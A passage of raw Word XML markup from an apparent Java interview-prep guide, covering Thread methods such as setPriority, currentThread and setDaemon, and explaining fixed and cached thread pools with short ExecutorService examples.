        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. getPriority() and setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE60E92" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gets and sets the priority of a thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC9CA49" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616224CA" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public int getPriority()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A4429" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1174"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public void setPriority(int priority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29858627"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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A thread’s priority is used by the thread scheduler to determine the order of execution. It can range from Thread.MIN_PRIORITY (1) to Thread.MAX_PRIORITY (10), with Thread.NORM_PRIORITY (5) being the default priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027854EC"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5E918A"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setPriority(Thread.MAX_PRIORITY);  // Set thread priority to maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100230A2"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System.out.println(t.getPriority());  // Prints the thread priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1064A2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>11. currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F17403" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns a reference to the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC9D23" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D251FE7" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>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public static Thread currentThread()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445D91B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>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Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method is useful when you want to get the current thread object from within a running thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6A1C5"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hread t = Thread.currentThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5198EEE9"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System.out.println(t.getName());  // Prints the name of the current thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73125382" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>12. setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A8D87" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Marks the thread as a daemon thread or a user thread. Daemon threads are automatically terminated when all user threads finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B42BB8" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>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Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDE3BF" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>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public void setDaemon(boolean on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B16EF2D" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A daemon thread is a background thread that performs tasks such as garbage collection or monitoring. It is terminated automatically when all non-daemon (user) threads terminate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E2748D"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hread t = new Thread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E31F1"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setDaemon(true);  // Set the thread as daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EED9F7" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:ind w:left="720"/>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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502CDCD4" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00000000" w:rsidP="00535C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CD06A11">
          <v:rect id="_x0000_i1843" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="642093D8" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4B5B6" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="00535C96" w:rsidRDefault="00D902FD" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These methods help in managing thread creation, execution, and control in Java. Some of the most commonly used methods include start(), run(), sleep(), join(), interrupt(), and isAlive(). Properly using thread methods is essential for building efficient and synchronized multi-threaded applications in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BABF6F" w14:textId="55743B77" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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CDE4119">
          <v:rect id="_x0000_i1844" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4827C" w14:textId="77777777" w:rsidR="002B412F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B412F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="_Toc196307757"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is thread pool? What are the types of thread pool?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w14:paraId="16248A96" w14:textId="16C2BE00" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a collection of worker threads that are ready to execute tasks. Instead of creating a new thread each time a task needs to be executed, you reuse threads from the pool. This approach improves performance, reduces resource consumption, and allows for better management of threads in a multi-threaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E560E8"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When you have a thread pool, you submit tasks to it, and the thread pool assigns those tasks to threads that are already available (idle). If all threads are busy, tasks are queued and executed as soon as a thread becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C3518B" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of Using a Thread Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BE9E2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:num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Efficiency:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads reduces the overhead of thread creation and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE85945" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:num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Resource Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It allows the system to limit the number of threads, preventing the system from creating too many threads, which could consume excessive resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5818F" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:num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Task Queuing:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tasks are queued until there is an available thread to process them, providing a controlled execution environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F382E73" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:num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Improved Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusing threads rather than creating new ones reduces the overhead and leads to faster task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295AFA60" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Types of Thread Pools in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243ED73"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In Java, thread pools can be created using the ExecutorService framework. The Executors class provides factory methods for creating different types of thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F90D93" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Fixed Thread Pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A8E1A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:num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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates a pool with a fixed number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A6326" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:num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Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The number of threads is fixed, and if all threads are busy, new tasks will be queued until a thread becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A6B44" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1178"/>
        </w:num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Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suitable when you have a known number of tasks that will run concurrently and you want to limit the number of threads executing at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7731EDF6"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182E389"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ExecutorService executor = Executors.newFixedThreadPool(4);  // 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FF1A3"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC5BF25"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 xml:space="preserve">    // Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942F2D6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AFA73"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16C73F"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 xml:space="preserve">    // Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6A1F1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DF5D2A" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Cached Thread Pool (Dynamic Thread Pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105DA17" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:num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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates a thread pool that can dynamically grow and shrink based on the number of tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C8949" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:num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Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If there are idle threads, they will be terminated after a certain time (default 60 seconds), and new threads will be created to handle new tasks. If there are tasks but no idle threads, new threads are created until a maximum limit is reached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B82B2" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:num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Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0982">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Best for applications where the number of tasks varies significantly over time, and you don't want to limit the number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751C3F3"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D72096"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ExecutorService executor = Executors.newCachedThreadPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1609F622"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17342F73"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 xml:space="preserve">    // Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D11FD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877EE21"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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF72BF2"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 xml:space="preserve">    // Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DD974"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BF868" w14:textId="77777777" w:rsidR="00D902FD" w:rsidRPr="006B0982" w:rsidRDefault="00D902FD" w:rsidP="006B0982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
